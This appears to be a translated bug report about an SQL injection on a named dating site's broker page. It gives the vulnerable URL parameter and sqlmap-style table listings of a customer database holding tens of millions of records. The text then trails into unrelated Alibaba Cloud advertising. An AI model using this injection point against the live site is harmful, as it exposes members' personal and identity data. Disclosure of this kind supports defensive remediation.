Some SQL injections at Century jiayuan involve millions of members.
An SQL injection at Century jiayuan, involving millions of members
Injection point:
http://vip.jiayuan.com/broker/?tag=1
Database:
Database: crm
+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| visit_log | 60138541 || logs | 46254602 || customer_value | 32607223 || customer_infos | 32596860 || customers | 32590720 || customer_visit | 24757214 || customer_assign_log | 17763487 || distribution_sales_log | 6242804 || customer_id_card_certify_log | 4522629 || customer_sea_logs | 3644865 || employee_login | 1875959 || customer_impress | 1487579 || customers_backup | 1349434 || call_log | 1298716 || customer_hand_import_log | 1184996 || customer_screening | 1052873 || customer_expire_giveup | 1032252 || customer_msg_without_mobile | 669339 || relation_change | 644987 || assistant_recommend | 512042 || contract_accessory | 473294 || mobile_location_info | 308623 || landing_page_stats | 196678 || sms_content | 90817 || recommend_visit_record | 84127 || contrct_annexfirst | 83534 || message | 72679 || pay_voucher | 51359 || contrct_customers | 47650 || cooperate_sales | 46852 || device_ids | 46375 || contract | 43342 || broker_app_download_stats | 42330 || sms_send_info | 39853 || ipay_settlement | 39088 || user_login_record | 31969 || schedule | 21535 || del_customers | 18681 || fund_records | 16522 || call_center_bind_log | 15317 || employee | 14992 || employee_roles | 14986 || sales_monthly_import_limit | 11032 || customer_edit_log | 9544 || contract_attach_4_closed | 9075 || employee_idcard_cert | 8681 || deposit | 6919 || broker | 6652 || broker_visit | 4967 || ad_channel | 4739 || shop_edit_log | 4690 || recommend_visit_record_20140226 | 4537 || statistics_resource | 3834 || broker_association | 3817 || recommend_visit_record_20140103 | 3681 || call_center_apply_register | 2871 || call_center_account | 2723 || roles_menus | 2447 || loan_bankcitys | 2180 || shops_auto_assign_stats | 2086 || contrct_annexsecond | 1882 || assign_citys | 1872 || letter | 1781 || broker_score_record | 1436 || contract_service_cate | 1247 || vip_show_recommend | 1172 || broker_assign_log | 1158 || sms_reply_info | 1105 || call_center_edit_log | 1097 || association | 1027 || vip_show_wechat | 746 || citys | 603 || regional_citys | 566 || shops_monthly_import_limit | 487 || baidu_push | 484 || customers_complain | 433 || broker_baidu_push_log | 425 || breakup | 365 || activity_reg | 364 || menus | 340 || targetline | 317 || assistant_cust_level_statis | 260 || sms_account | 204 || employee_phone_certify_log | 200 || call_center_apply_log_off | 165 || ip_priv_log | 161 || customer_photo | 158 || ip_priv | 134 || shops | 117 || feedback | 91 || broker_feedback | 79 || contract_agreement | 70 || success_case | 66 || vip_focus | 59 || roles | 46 || broker_news | 40 || file | 33 || commission | 31 || broker_score_config | 17 || loan_preliminarycredit | 17 || broker_complaint | 16 || crm_add_customer_log | 15 || broker_app_stats | 13 || broker_app_versions | 13 || broker_score_upload | 12 || system_config | 12 || activity | 11 || broker_remark | 11 || jiayuan_test_account | 7 || regional | 7 || versions | 7 || broker_commission | 5 || notify | 5 || auto_assign_set | 4 || sms_batch_content | 1 |+---------------------------------+---------+
Database: crm_source
+----------------+---------+| Table | Entries |+----------------+---------+| customers | 35629175 || customer_infos | 35621012 |+----------------+---------+Solution:
I'm just a child.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
